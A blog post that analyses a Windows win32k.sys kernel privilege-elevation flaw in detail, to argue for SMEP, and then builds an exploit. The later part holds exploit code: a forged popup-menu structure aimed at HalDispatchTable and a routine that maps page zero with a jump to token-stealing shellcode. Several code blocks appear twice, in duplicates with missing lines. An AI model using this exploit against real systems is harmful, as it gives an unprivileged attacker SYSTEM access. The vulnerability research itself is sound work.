The Case for SMEP – Exploiting a Kernel Vulnerability

By Gal Badishi | September 20, 2013

Suppose you manage to exploit a vulnerability by directing a user to a malicious web site, or sending someone a specially crafted document. You can execute code at the permission-level of the user that was unfortunate enough to get owned, but he’s not an administrator, and you’re feeling greedy. Now what?

If you want to have administrator access while already running as an unprivileged user on the machine, you need a privilege elevation vulnerability. Today we are going to discuss a privilege-elevation kernel vulnerability that was presented by Gilad Bakas in Ruxcon 2011. The vulnerability was reported to be silently fixed by MS on February 2011. Our contributions will be as follows:

We will highlight some differences between the presentation and the disassembled binaries that we work with.
We will dive much much deeper into the code and see the exact steps needed for the attack to succeed.
We will not use the exact same way to trigger the vulnerability as was presented in Ruxcon, but rather a variant thereof. We will also not need the page 0 allocation that is described in the presentation.

Unless noted otherwise, the pseudo-code and disassembled code relate to the 32-bit Windows XP’s user32.dll and win32k.sys binaries, v5.1.2600.5512, dated 14/4/2008. The vulnerability affects Windows 7 as well.

Background

Whenever a window is created by using some user32.dll API function, a kernel object that represents that window is created by win32k.sys. This means that “regular” windows, buttons, menus, tooltips, etc. all have a kernel object that represents them. Each window object is created from a specific class. You can create classes of your own, or use built-in classes of the OS. The kernel class object can be described as follows:

typedef struct tagCLS {
    PCLS          pclsNext;
    ATOM          atomClassName;
    WORD          fnid;
    PDESKTOP      rpdeskParent;
    PDCE          pdce;
    WORD          hTaskWow;
    WORD          CSF_flags;
    LPSTR         lpszClientAnsiMenuName;
    LPWSTR        lpszClientUnicodeMenuName;
    PCALLPROCDATA spcpdFirst;
    PCLS          pclsBase;
    PCLS          pclsClone;
    int           cWndReferenceCount;
    UINT          style;
    WNDPROC       lpfnWndProc;
    int           cbclsExtra;
    int           cbwndExtra;
    HMODULE       hModule;
    PCURSOR       spicn;
    PCURSOR       spcur;
    HBRUSH        hbrBackground;
    LPWSTR        lpszMenuName;
    LPSTR         lpszAnsiClassName;
    PCURSOR       spicnSm;
} CLS, *PCLS;

typedef struct tagCLS {

PCLS pclsNext;

ATOM atomClassName;

WORD fnid;

PDESKTOP rpdeskParent;

PDCE pdce;

WORD hTaskWow;

WORD CSF_flags;

LPSTR lpszClientAnsiMenuName;

LPWSTR lpszClientUnicodeMenuName;

PCALLPROCDATA spcpdFirst;

PCLS pclsBase;

PCLS pclsClone;

int cWndReferenceCount;

UINT style;

WNDPROC lpfnWndProc;

int cbclsExtra;

int cbwndExtra;

HMODULE hModule;

PCURSOR spicn;

PCURSOR spcur;

HBRUSH hbrBackground;

LPWSTR lpszMenuName;

LPSTR lpszAnsiClassName;

PCURSOR spicnSm;

} CLS, *PCLS;

The following fields are of interest to us in the context of the exploit:

atomClassName: An ATOM that uniquely identifies the class. Some ATOMs are predefined and reserved by the OS for internal classes.
fnid: A number that is supposed to identify the type of window that will be created from this class. For user classes, this is supposed to be 0. For OS classes (e.g., button, menu, etc.) this should be a non-zero number identifying the window type.
cbwndExtra: The number of bytes to allocate in the kernel beyond the basic WND structure that represents a basic window. This way, both the OS and the programmer can create window classes that are based on a “regular” window, but contain extra data that is needed for working with windows of that class.

The basic internal structure of a window is largely as follows:

typedef struct tagWND {
    THRDESKHEAD          head;
    DWORD                dwState;
    DWORD                dwState2;
    DWORD                dwExStyle;
    DWORD                dwStyle;
    HMODULE              hModule;
    WORD                 hMod16;
    WORD                 fnid;
    PWND                 spwndNext;
    PWND                 spwndParent;
    PWND                 spwndChild;
    PWND                 spwndOwner;
    RECT                 rcWindow;
    RECT                 rcClient;
    WNDPROC              lpfnWndProc;
    PCLS                 pcls;
    HRGN                 hrgnUpdate;
    PPROPLIST            ppropList;
    PSBINFO              pSBInfo;
    PMENU                spmenuSys;
    PMENU                spmenu;
    HRGN                 hrgnClip;
    LARGE_UNICODE_STRING strName;
    int                  cbwndExtra;
    PWND                 spwndLastActive;
    HIMC                 hImc;
    ULONG_PTR            dwUserData;
    DWORD                field1;
    DWORD                field2;
} WND, *PWND;

typedef struct tagWND {

THRDESKHEAD head;

DWORD dwState;

DWORD dwState2;

DWORD dwExStyle;

DWORD dwStyle;

HMODULE hModule;

WORD hMod16;

WORD fnid;

PWND spwndNext;

PWND spwndParent;

PWND spwndChild;

PWND spwndOwner;

RECT rcWindow;

RECT rcClient;

WNDPROC lpfnWndProc;

PCLS pcls;

HRGN hrgnUpdate;

PPROPLIST ppropList;

PSBINFO pSBInfo;

PMENU spmenuSys;

PMENU spmenu;

HRGN hrgnClip;

LARGE_UNICODE_STRING strName;

int cbwndExtra;

PWND spwndLastActive;

HIMC hImc;

ULONG_PTR dwUserData;

DWORD field1;

DWORD field2;

} WND, *PWND;

The size of this structure is 0xa4 bytes. Whenever a new window object is created in the kernel, the OS allocates sizeof(WND) + cbwndExtra bytes for the window. If the corresponding window class was created by the OS, it’s the OS that knows what to do with the extra bytes, and is in charge of manipulating them as needed. If the window class was registered by the user, the OS has no knowledge of what the extra bytes mean, and the user is responsible for handling them. Usually, in user-defined windows, cbwndExtra is 0.

To create classes of your own, you may use the functions RegisterClass or RegisterClassEx. Let’s look at what RegisterClassEx does:

ATOM __stdcall RegisterClassExW(const WNDCLASSEXW *pWndClassExW)
{
    ATOM result; // ax@2

    if (pWndClassExW->cbSize == 48)
    {
        result = RegisterClassExWOWW(pWndClassExW, 0, 0, 256);
    }
    else
    {
        UserSetLastError(ERROR_INVALID_PARAMETER);
        result = 0;
    }
    return result;
}

ATOM __stdcall RegisterClassExW(const WNDCLASSEXW *pWndClassExW)

{

ATOM result; // ax@2

if (pWndClassExW->cbSize == 48)

{

result = RegisterClassExWOWW(pWndClassExW, 0, 0, 256);

}

else

{

UserSetLastError(ERROR_INVALID_PARAMETER);

result = 0;

}

return result;

}

So basically, all the APIs for registering a class end up in a call to RegisterClassExWOW(A/W). The user controls only one parameter to that function, and that’s the first parameter. It turns out that the 3rd parameter is the fnid. Like so:

ATOM __stdcall RegisterClassExWOWW(const WNDCLASSEXW *pWndClassExW, int a2, int fnid, int a4);

1	ATOM __stdcall RegisterClassExWOWW(const WNDCLASSEXW *pWndClassExW, int a2, int fnid, int a4);

Here’s an example where RegisterClassExWOWW is called with non-zero fnids:

int __cdecl RW_RegisterControls()
{
    int flag; // ebx@1
    unsigned int index; // esi@1
    LPCTSTR lpszCursor; // ST0C_4@2
    ATOM res; // ax@2
    WNDCLASSEXW pWndClassExW; // [sp+Ch] [bp-30h]@1

    memset(&pWndClassExW, 0, sizeof(pWndClassExW));
    LOBYTE(flag) = 1;
    pWndClassExW.cbSize = 48;
    pWndClassExW.hInstance = hmodUser;
    index = 0;
    do
    {
        lpszCursor = arrClassInit[index].lpszCursor;
        pWndClassExW.style = arrClassInit[index].style;
        pWndClassExW.lpfnWndProc = arrClassInit[index].lpfnWndProc;
        pWndClassExW.cbWndExtra = arrClassInit[index].cbWndExtra;
        pWndClassExW.hCursor = LoadCursorW(0, (LPCWSTR)lpszCursor);
        pWndClassExW.hbrBackground = arrClassInit[index].hbrBackground;
        pWndClassExW.lpszClassName = (LPCWSTR)arrClassInit[index].lpszClassName;
        res = RegisterClassExWOWW(&pWndClassExW, 0, arrClassInit[index].fnid, 0);
        ++index;
        flag = res != 0 & (unsigned __int8)flag;
    }
    while (index < 9);
    return flag;
}

int __cdecl RW_RegisterControls()

{

int flag; // ebx@1

unsigned int index; // esi@1

LPCTSTR lpszCursor; // ST0C_4@2

ATOM res; // ax@2

WNDCLASSEXW pWndClassExW; // [sp+Ch] [bp-30h]@1

memset(&pWndClassExW, 0, sizeof(pWndClassExW));

LOBYTE(flag) = 1;

pWndClassExW.cbSize = 48;

pWndClassExW.hInstance = hmodUser;

index = 0;

{

lpszCursor = arrClassInit[index].lpszCursor;

pWndClassExW.style = arrClassInit[index].style;

pWndClassExW.lpfnWndProc = arrClassInit[index].lpfnWndProc;

pWndClassExW.cbWndExtra = arrClassInit[index].cbWndExtra;

pWndClassExW.hCursor = LoadCursorW(0, (LPCWSTR)lpszCursor);

pWndClassExW.hbrBackground = arrClassInit[index].hbrBackground;

pWndClassExW.lpszClassName = (LPCWSTR)arrClassInit[index].lpszClassName;

res = RegisterClassExWOWW(&pWndClassExW, 0, arrClassInit[index].fnid, 0);

++index;

flag = res != 0 & (unsigned __int8)flag;

}

while (index < 9);

return flag;

}

So we see that the control classes are being registered, and the fnid values are not 0. Let’s take a look at what the array for initializing the controls contains:

struct CLASSINIT {
    UINT    style;
    WNDPROC lpfnWndProcW;
    int     cbWndExtra;
    LPCTSTR lpszCursor;
    HBRUSH  hbrBackground;
    LPCTSTR lpszClassName;
    WORD    fnid;
    WORD    padding;
};

struct CLASSINIT {

UINT style;

WNDPROC lpfnWndProcW;

int cbWndExtra;

LPCTSTR lpszCursor;

HBRUSH hbrBackground;

LPCTSTR lpszClassName;

WORD fnid;

WORD padding;

};

; CLASSINIT arrClassInit[9]
arrClassInit
CLASSINIT <408Bh, offset _ButtonWndProcW@16, 4, 7F00h, 0, offset aButton, 2A1h, 0>
CLASSINIT <408Bh, offset _ComboBoxWndProcW@16, 4, 7F00h, 0, offset aCombobox, 2A2h, 0>
CLASSINIT <4808h, offset _ComboListBoxWndProcW@16, 4, 7F00h, 0, offset aCombolbox, 2A3h, 0>
CLASSINIT <4808h, offset _DefDlgProcW@16, 1Eh, 7F00h, 0, 8002h, 2A4h, 0>
CLASSINIT <4088h, offset _EditWndProcW@16, 6, 7F01h, 0, offset aEdit, 2A5h, 0>
CLASSINIT <4088h, offset _ComboListBoxWndProcW@16, 4, 7F00h, 0, offset aListbox, 2A6h, 0>
CLASSINIT <4000h, offset _MDIClientWndProcW@16, 8, 7F00h, 0Dh, offset aMdiclient, 2A7h, 0>
CLASSINIT <4000h, offset _ImeWndProcW@16, 4, 7F00h, 0, offset aIme, 2A9h, 0>
CLASSINIT <4088h, offset _StaticWndProcW@16, 4, 7F00h, 0, offset aStatic, 2A8h, 0>

; CLASSINIT arrClassInit[9]

arrClassInit

CLASSINIT <408Bh, offset _ButtonWndProcW@16, 4, 7F00h, 0, offset aButton, 2A1h, 0>

CLASSINIT <408Bh, offset _ComboBoxWndProcW@16, 4, 7F00h, 0, offset aCombobox, 2A2h, 0>

CLASSINIT <4808h, offset _ComboListBoxWndProcW@16, 4, 7F00h, 0, offset aCombolbox, 2A3h, 0>

CLASSINIT <4808h, offset _DefDlgProcW@16, 1Eh, 7F00h, 0, 8002h, 2A4h, 0>

CLASSINIT <4088h, offset _EditWndProcW@16, 6, 7F01h, 0, offset aEdit, 2A5h, 0>

CLASSINIT <4088h, offset _ComboListBoxWndProcW@16, 4, 7F00h, 0, offset aListbox, 2A6h, 0>

CLASSINIT <4000h, offset _MDIClientWndProcW@16, 8, 7F00h, 0Dh, offset aMdiclient, 2A7h, 0>

CLASSINIT <4000h, offset _ImeWndProcW@16, 4, 7F00h, 0, offset aIme, 2A9h, 0>

CLASSINIT <4088h, offset _StaticWndProcW@16, 4, 7F00h, 0, offset aStatic, 2A8h, 0>

We can see that each control class has its own unique fnid, and unlike the user-registered classes, that fnid is not 0. Another interesting thing to note is that every window here has extra bytes for more information other than the regular WND structure.

The function RegisterClassExWOWW is not exported. However, we can easily get to it by dynamically disassembling the code of RegisterClassExW and finding the call to RegisterClassExWOWW. By Calling RegisterClassExWOWW directly, we are able to control its 3rd arugment – the fnid. But how does this help us?

When a user registers a class and asks for extra bytes, he needs a way to change them later. Since the real window object is in kernel memory, the user cannot access the extra bytes directly, and so must use an API function such as SetWindowLong. SetWindowLong can be used to change values in the WND structure itself (like style), or in the extra bytes that come after it, with one exception: you cannot change the extra bytes allocated by the system for internal classes (fnid != 0). These are considered private bytes and can only be changed by the system. The way the system determines whether we are trying to overwrite the private bytes is by consulting a private table (in a global SERVERINFO structure) that contains the cbWndExtra values for all system fnids. This mechanism allows support for both private bytes and user bytes in the same internal window class.

SetWindowLong in user32.dll eventually calls NtUserSetWindowLong in win32k.sys, which in turn calls the function that does the real work, xxxSetWindowLong. The pseudo-code for the relevant parts of the function goes something like this:

int __stdcall xxxSetWindowLong(PWND pWnd, int nIndex, ULONG dwNewLong, BOOL isANSI)
{
	// Don't allow user threads to change windows of system threads
	if (!FCallerOk(pWnd))
		SetErrorAndReturn(ERROR_ACCESS_DENIED);
	// Check if this is a window created from a system class (using the fnid)
	if (pWnd->fnid & 0x3FFF != 0) {
		if (!isDialogWindow(pWnd)) {
			// Check if we're trying to set the window's private data
			if (nIndex >= 0 && nIndex < gpsi->cbFnidWndSize[fnid] - sizeof(WND)) {
				if (isFnidControl(pWnd->fnid) || isFnidIME(pWnd->fnid) || )
					if (index == 0 && (*(PVOID *)(pWnd + 1) == NULL || isDestroyed(pWnd)))
						// No such function - just for brevity
						return SetTheLong(pWnd, nIndex, dwNewLong);
				if (isFnidMDI(pwnd->fnid))
					if (nIndex == 0 || (nIndex == 4 && (*(PVOID *)(pWnd + 1) == NULL || isDestroyed(pWnd))))
						return SetTheLong(pWnd, nIndex, dwNewLong);
				SetErrorAndReturn(ERROR_INVALID_INDEX);
			}
		}
		// Dialog window - not interesting
		else {
			// Allow setting some values or return with an error
		}
	}
	if (nIndex < 0)
		return xxxSetWindowData(pWnd, nIndex, dwNewLong, isANSI);
	// Check that we're not crossing the end of the extra bytes when writing
	else
		if (nIndex + sizeof(LONG) > pWnd->cbwndExtra)
			SetErrorAndReturn(ERROR_INVALID_INDEX);
		else
			return SetTheLong(pWnd, nIndex, dwNewLong);
}

int __stdcall xxxSetWindowLong(PWND pWnd, int nIndex, ULONG dwNewLong, BOOL isANSI)

{

// Don't allow user threads to change windows of system threads

if (!FCallerOk(pWnd))

SetErrorAndReturn(ERROR_ACCESS_DENIED);

// Check if this is a window created from a system class (using the fnid)

if (pWnd->fnid & 0x3FFF != 0) {

if (!isDialogWindow(pWnd)) {

// Check if we're trying to set the window's private data

if (nIndex >= 0 && nIndex < gpsi->cbFnidWndSize[fnid] - sizeof(WND)) {

if (isFnidControl(pWnd->fnid) || isFnidIME(pWnd->fnid) || )

if (index == 0 && (*(PVOID *)(pWnd + 1) == NULL || isDestroyed(pWnd)))

// No such function - just for brevity

return SetTheLong(pWnd, nIndex, dwNewLong);

if (isFnidMDI(pwnd->fnid))

if (nIndex == 0 || (nIndex == 4 && (*(PVOID *)(pWnd + 1) == NULL || isDestroyed(pWnd))))

return SetTheLong(pWnd, nIndex, dwNewLong);

SetErrorAndReturn(ERROR_INVALID_INDEX);

}

// Dialog window - not interesting

else {

// Allow setting some values or return with an error

}

if (nIndex < 0)

return xxxSetWindowData(pWnd, nIndex, dwNewLong, isANSI);

// Check that we're not crossing the end of the extra bytes when writing

else

if (nIndex + sizeof(LONG) > pWnd->cbwndExtra)

SetErrorAndReturn(ERROR_INVALID_INDEX);

else

return SetTheLong(pWnd, nIndex, dwNewLong);

}

So, in order to successfully set a window’s long beyond the WND structure part, disregarding dialog windows, we must make sure that:

0 <= nIndex <= pwnd->cbWndExtra – sizeof(LONG).
If pWnd->fnid != 0, then nIndex >= gpsi->cbFnidWndSize[fnid] – sizeof(WND) (or nIndex == 0 and the window is currently being created or destroyed).

Enough background for now. Let’s go smash some pointers, shall we?

The Vulnerability

The background part has already given us two interesting facts:

We can use RegisterClassExWOWW to supply a non-zero fnid.
xxxSetWindowLong uses values associated with the fnid to determine whether or not we’re trashing private data.

The second point is very important: there can be a disparity between the fnid table holding the assumed size of the object, and sizeof(WND) + pWnd->cbwndExtra, representing the actual size of the object. If we can create such a disparity, we can trick the checking code into thinking that we’re not overwriting private data, but rather just writing some “regular” extra bytes. In order to do so, we’ll need to find a way to modify the fnid table.

RegisterClassExWOWW in user32.dll calls NtUserRegisterClassExWOW in win32k.sys. Eventually, NtUserRegisterClassExWOW does the following:

if ( *(_QWORD *)&wndClassEx.cbClsExtra < 0i64 || wndClassEx.cbSize != 48 )
    UserSetLastError(ERROR_INVALID_PARAMETER);
else
    v23 = xxxRegisterClassEx(&wndClassEx, &v27, FNID, csfFlags, v22);

if ( *(_QWORD *)&wndClassEx.cbClsExtra < 0i64 || wndClassEx.cbSize != 48 )

UserSetLastError(ERROR_INVALID_PARAMETER);

else

v23 = xxxRegisterClassEx(&wndClassEx, &v27, FNID, csfFlags, v22);

Note that the structure used for registering the class is checked, and the function fails if either cbClsExtra or cbWndExtra are negative. This is in contrast to what is implied in the Ruxcon presentation, where a negative value is used for cbWndExtra when registering the malicious class. This is one place where we have to divert from the presentation. Other places will soon follow.

xxxRegisterClassEx calls InternalRegisterClassEx, where we find this piece of code (pcls is the pointer to the class object that we’re currently registering):

if (FNID)
    *(_WORD *)(gpsi + 2 * (FNID & 0x3FFF) - 0x48C) = LOWORD(pcls->cbWndExtra) + 0xA4;

1 2	if (FNID) (_WORD )(gpsi + 2 * (FNID & 0x3FFF) - 0x48C) = LOWORD(pcls->cbWndExtra) + 0xA4;

Let me put that in an easier-to-digest form:

if (FNID)
    gpsi->cbFnidWndSize[FNID] = LOWORD(pcls->cbWndExtra) + sizeof(WND);

1 2	if (FNID) gpsi->cbFnidWndSize[FNID] = LOWORD(pcls->cbWndExtra) + sizeof(WND);

Which means that if we register a class using a system fnid, the value in the table that saves the assumed size of the corresponding windows will be modified, but the cbWndExtra field in the corresponding system class is going to stay the same. Disparity achieved.

To abuse this disparity, we need to do the following:

Find an interesting system class with private data (pclsSystem->cbWndExtra >= gpsi->cbFnidWndSize[fnidSystem] – sizeof(WND) > 0).
Register a class using fnidSystem and pclsUser->cbWndExtra == 0. Now we get that pclsSystem->cbWndExtra > gpsi->cbFnidWndSize[fnidSystem] – sizeof(WND) (which is 0).
Create a window using the system class. The Ruxcon presentation is not explicit about which window class to create (the malformed or the original), but we will later see why we must use the actual system class.
Trash the window’s private data using SetWindowLong with an offset of 0 (or whatever is applicable).
Make use of it.

Note that every once in a while (presumably whenever a GUI thread is created), the global gpsi->cbFnidWndSize[fnidSystem] will be overwritten to revert to its original state. Why would someone want that is beyond me, but in this case it doesn’t really matter to us, because the periods between such resets are very long compared to the time it takes to complete steps 2 to 4.

The Ruxcon presentation suggests overwriting the private data of a menu object. To see why, let’s see some properties of menus.

When win32k.sys is loaded into memory, its DriverEntry function calls Win32UserInitialize, which in turn calls SetupClassAtoms. In there we can find:

*(_WORD *)(gpsi + 0x1E2) = 0x8002u;           // Dialog
*(_WORD *)(gpsi + 0x1E8) = 0x8004u;           // Icon title
*(_WORD *)(gpsi + 0x1EA) = 0x8006u;           // Tooltip
*(_WORD *)(gpsi + 0x1E0) = 0x8001u;           // Desktop
*(_WORD *)(gpsi + 0x1E6) = 0x8003u;           // Switch
*(_WORD *)(gpsi + 0x1E4) = 0x8000u;           // Menu

*(_WORD *)(gpsi + 0x1E2) = 0x8002u; // Dialog

*(_WORD *)(gpsi + 0x1E8) = 0x8004u; // Icon title

*(_WORD *)(gpsi + 0x1EA) = 0x8006u; // Tooltip

*(_WORD *)(gpsi + 0x1E0) = 0x8001u; // Desktop

*(_WORD *)(gpsi + 0x1E6) = 0x8003u; // Switch

*(_WORD *)(gpsi + 0x1E4) = 0x8000u; // Menu

The values are taken from here. But what if we want to validate the docs? How do we know that 0×8000 is indeed the menu class atom? Let’s take a look at xxxTrackPopupMenuEx, which actually creates a menu window:

v14 = xxxCreateWindowEx(
	  0x181,
	  (LPCWSTR)0x8000,
	  (LPCWSTR)0x8000,
	  0,
	  0x80800000u,
	  pt.x,
	  pt.y,
	  100,
	  100,
	  (tagWND *)((*(_DWORD *)(a1 + 20) & 0x40000000) != 0 ? a4 : 0),
	  0,
	  *(HINSTANCE *)(a4 + 36),
	  0,
	  0x501u,
	  0);

v14 = xxxCreateWindowEx(

0x181,

(LPCWSTR)0x8000,

0x80800000u,

pt.x,

pt.y,

100,

(tagWND *)((*(_DWORD *)(a1 + 20) & 0x40000000) != 0 ? a4 : 0),

*(HINSTANCE *)(a4 + 36),

0x501u,

0);

So that’s how we know that. Speaking of creating a menu window, in the menu’s window procedure, xxxMenuWindowProc, we can find something like this:

if (pMenuWnd->fnid != 0x29C) {
	// Either return, or set pMenuWnd->fnid to 0x29C
}

if (pMenuWnd->fnid != 0x29C) {

// Either return, or set pMenuWnd->fnid to 0x29C

}

So the fnid for a menu is 0x29c. Recall from the background that gpsi + 2 * fnid – 0x48c held the size of the menu window object (the one we would like to overwrite). Since FNID_MENU is 0x29c, we get that gpsi + 0xac holds the size of the menu window object. The function InitFunctionTables (also called from Win32UserInitialize) shows us this:

*(_DWORD *)(gpsi + 0x8C) = xxxSBWndProc;
*(_DWORD *)(gpsi + 0x90) = xxxDefWindowProc;
*(_DWORD *)(gpsi + 0x94) = xxxMenuWindowProc;
*(_DWORD *)(gpsi + 0x98) = xxxDesktopWndProc;
*(_DWORD *)(gpsi + 0x9C) = xxxDefWindowProc;
*(_DWORD *)(gpsi + 0xA0) = xxxDefWindowProc;
*(_WORD *)(gpsi + 0xA8) = 0xECu;
*(_WORD *)(gpsi + 0xAA) = 0xA4u;
*(_WORD *)(gpsi + 0xAC) = 0xA8u;

*(_DWORD *)(gpsi + 0x8C) = xxxSBWndProc;

*(_DWORD *)(gpsi + 0x90) = xxxDefWindowProc;

*(_DWORD *)(gpsi + 0x94) = xxxMenuWindowProc;

*(_DWORD *)(gpsi + 0x98) = xxxDesktopWndProc;

*(_DWORD *)(gpsi + 0x9C) = xxxDefWindowProc;

*(_DWORD *)(gpsi + 0xA0) = xxxDefWindowProc;

*(_WORD *)(gpsi + 0xA8) = 0xECu;

*(_WORD *)(gpsi + 0xAA) = 0xA4u;

*(_WORD *)(gpsi + 0xAC) = 0xA8u;

So the size of a menu window object is 0xa8. This is sizeof(WND) + 4, which means that a menu window has 4 bytes of private data we can overwrite. Let’s see what this data is:

typedef struct tagMENUWND {
    WND         wnd;
    PPOPUPMENU  ppopupmenu;
} MENUWND, *PMENUWND;

typedef struct tagMENUWND {

WND wnd;

PPOPUPMENU ppopupmenu;

} MENUWND, *PMENUWND;

Where:

typedef struct tagPOPUPMENU {
    DWORD       dwFlags;
    PWND        spwndNotify;
    PWND        spwndPopupMenu;
    PWND        spwndNextPopup;
    PWND        spwndPrevPopup;
    PMENU       spmenu;
    PMENU       spmenuAlternate;
    PWND        spwndActivePopup;
    PPOPUPMENU  ppopupmenuRoot;
    PPOPUPMENU  ppmDelayedFree;
    UINT        posSelectedItem;
    UINT        posDropped;
} POPUPMENU, *PPOPUPMENU;

typedef struct tagPOPUPMENU {

DWORD dwFlags;

PWND spwndNotify;

PWND spwndPopupMenu;

PWND spwndNextPopup;

PWND spwndPrevPopup;

PMENU spmenu;

PMENU spmenuAlternate;

PWND spwndActivePopup;

PPOPUPMENU ppopupmenuRoot;

PPOPUPMENU ppmDelayedFree;

UINT posSelectedItem;

UINT posDropped;

} POPUPMENU, *PPOPUPMENU;

Upon creating the new menu window, an NC_CREATE message will be sent to the window and handled by xxxMenuWindowProc like so:

if (msg == WM_NCCREATE)
{
    if (pMenuWnd->ppopupmenu || (pPopupMenu = MNAllocPopup(1)) == 0)
        return 0;
    pMenuWnd->ppopupmenu = pPopupMenu;
    pPopupMenu->posSelectedItem = -1;
    HMAssignmentLock(&pPopupMenu->spwndPopupMenu, pMenuWnd);
}

if (msg == WM_NCCREATE)

{

if (pMenuWnd->ppopupmenu || (pPopupMenu = MNAllocPopup(1)) == 0)

return 0;

pMenuWnd->ppopupmenu = pPopupMenu;

pPopupMenu->posSelectedItem = -1;

HMAssignmentLock(&pPopupMenu->spwndPopupMenu, pMenuWnd);

}

So the popup menu itself is allocated upon creation of the window, if it doesn’t yet exist. Upon destruction of the window, the WM_FINALDESTROY message is processed by xxxMenuWindowProc, which calls xxxMNDestroyHandler, passing it a parameter which is the pointer to the popup menu that was created upon receiveing WM_NCCREATE, and associated with the menu window.

Since our course of action would be to overwrite the pointer to the popup menu, we need to watch closely on what xxxMNDestroyHandler does exactly. On the one hand, we may find spots that will help us overwrite other values in memory. On the other hand, we must be careful and make sure the values we supply don’t cause the kernel to collapse.

Here is the important information from xxxMNDestroyHandler:

If ppopupmenu->spwndNextPopup != NULL it sends an MN_CLOSEHIERARCHY message to either ppopupmenu->spwndPopupMenu or ppopupmenu->spwndNextPopup.
If ppopupmenu->spmenu != NULL and an item is selected, it accesses and manipulates values referenced by ppopupmenu->spmenu.
If the flag 0×2000 is set in ppopupmenu->dwFlags, it calls _KillTimer(ppopupmenu->spwndPopupMenu, 0xFFFEu), which manipulates values related to ppopupmenu->spwndPopupMenu.
If the flag 0×4000 is set, almost the same thing happens, except the argument to _KillTimer is 0xFFFF.
If the flag 0×200000 is set and ppopupmenu->spwndNotify != NULL, it sends a WM_UNINITMENUPOPUP message to ppopupmenu->spwndNotify.
It sets the flag 0×8000, indicating that the popup menu is destroyed. This is a write operation into arbitrary memory that we can use to our advantage if we want to.
If the flag 0×800000 is not set, and ppopupmenu->spwndPopupMenu != NULL, it nulls ppopupmenu->spwndPopupMenu->ppopupmenu. This is a write operation through 2 dereferences. The destination can be controlled by us or not, depending on how we choose to exploit the target.
If the flag 0×10000 is not set, it calls MNFreePopup(ppopupmenu).
If the flag 0×10000 is set and ppopupmenu->ppopupmenuRoot != NULL, it manipulates values in ppopupmenu->ppopupmenuRoot.

So right now we have a mandatory write (OR operation) that is going to happen, plus a NULL write that might happen (through double-dereference), and a call to MNFreePopup that might also happen. Let us see what MNFreePopup does:

If ppopupmenu == ppopupmenu->ppopupmenuRoot, it calls MNFlushDestroyedPopups.
It unlocks all the windows and menus pointed at by ppopupmenu, if they are not NULL. This includes decrementing cLockObj in head by 1 for every window/menu, and then nulling the appropriate pointer.
If the flag 0×800000 is set in ppopupmenu->dwFlags, it nulls ppopupmenu->ppopupmenuRoot.
If the flag 0×800000 is not set, it performs another check that is going to fail and then lead you to HeavyFreePool(ppopupmenu). Assuming you have overwritten that pointer with your value, if you get here you are guaranteed a BSOD.

Armed with all this knowledge, we can now go and write our exploit.

Exploitation Details

The images in the Ruxcon presentation make it seem as if an arbitrary overwrite using just one dereference (ppopupmenu) is viable. Unfortunately, we have seen all the hurdles that await us if we try to do it that way. We might access memory regions that we’re not allowed to access, and change kernel memory in ways that we’ll regret afterwards. It is best if we stick to the double-dereference nulling of a pointer through ppopupmenu->spwndPopupMenu. We will direct ppopupmenu to a memory completely in our control, and then control the single value that will be nulled. Note that if we get to MNFreePopup, this will also mean that spwndPopupMenu will get “unlocked”, thereby decrementing a value through the spwndPopupMenu pointer. We will use this side-effect to our advantage later.

One other thing we want to do is to avoid calling MNFreePopup, the main reason being that in order to reach the double-dereference nulling, we need flag 0×800000 (desktop menu) to not be set. However, if we reach MNFreePopup with that flag not set, it calls HeavyFreePool and we get a BSOD. To avoid this we must set flag 0×10000 (delayed free). So, in principal, we want the entire POPUPMENU structure to be 0, except dwFlags, which should be 0×10000, and spwndPopupMenu, which should point to the area we want to overwrite (spwnPopupMenu->ppopupmenu is going to be nulled).

In this example, we’re going to use the well-known technique of overwriting HalDispatchTable’s entry for NtQueryIntervalProfile. That’s the second entry, meaning 4 bytes from the start of HalDispatchTable. We know that the nulling command is ppopupmenu->spwndPopupMenu->ppopupmenu = NULL. We also know that ppopupmenu in MENUWND comes right after the WND structure, meaning starting at byte 0xa4. Thus, we need spwndPopupMenu to point 0xa4 bytes before the address we want to overwrite. Here is the setup:

tagPOPUPMENU tpm;

memset(&tpm, 0, sizeof(tpm));
tpm.spwndPopupMenu = (DWORD)HalDispatchTable - 0xA0;
tpm.dwFlags = FLAG_DELAYED_FREE;

tagPOPUPMENU tpm;

memset(&tpm, 0, sizeof(tpm));

tpm.spwndPopupMenu = (DWORD)HalDispatchTable - 0xA0;

tpm.dwFlags = FLAG_DELAYED_FREE;

The code we will put in page 0 is a simple jump to our C function. The function itself can do a very straightforward procedure like changing the process’s token to have SYSTEM privileges. As our exploit is agnostic to what code we’re going to run, we can just use any privilege elevation code that runs from the kernel (perhaps wrapping it with a stack-preserving function):

BOOL AllocateTrampoline(LPVOID *addr) {

	BOOL res = FALSE;
	HANDLE hModule;
	LPVOID trampAddr;
	SIZE_T size = 5;
	_NtAllocateVirtualMemory NtAllocateVirtualMemory;

	if (addr == NULL)
		return FALSE;
	trampAddr = *addr;
	if (*addr == NULL)
		*addr = (LPVOID)1;
	if ((hModule = LoadLibrary(L"ntdll")) == NULL)
		return FALSE;
	NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(hModule, "NtAllocateVirtualMemory");
	if (NtAllocateVirtualMemory)
		if (NtAllocateVirtualMemory(-1, addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == 0) {
			*(BYTE *)trampAddr = 0xE9;
			*(ULONG_PTR *)((BYTE *)trampAddr + 1) = (ULONG_PTR)KernelShellcodePatchToken - (ULONG_PTR)trampAddr - 5;
			res = TRUE;
		}
	FreeLibrary(hModule);
	return res;
}

BOOL AllocateTrampoline(LPVOID *addr) {

BOOL res = FALSE;

HANDLE hModule;

LPVOID trampAddr;

SIZE_T size = 5;

_NtAllocateVirtualMemory NtAllocateVirtualMemory;

if (addr == NULL)

return FALSE;

trampAddr = *addr;

if (*addr == NULL)

*addr = (LPVOID)1;

if ((hModule = LoadLibrary(L"ntdll")) == NULL)

return FALSE;

NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(hModule, "NtAllocateVirtualMemory");

if (NtAllocateVirtualMemory)

if (NtAllocateVirtualMemory(-1, addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == 0) {

*(BYTE *)trampAddr = 0xE9;

*(ULONG_PTR *)((BYTE *)trampAddr + 1) = (ULONG_PTR)KernelShellcodePatchToken - (ULONG_PTR)trampAddr - 5;

res = TRUE;

}

FreeLibrary(hModule);

return res;

}

And then:

printf("[*] Preparing trampoline... ");
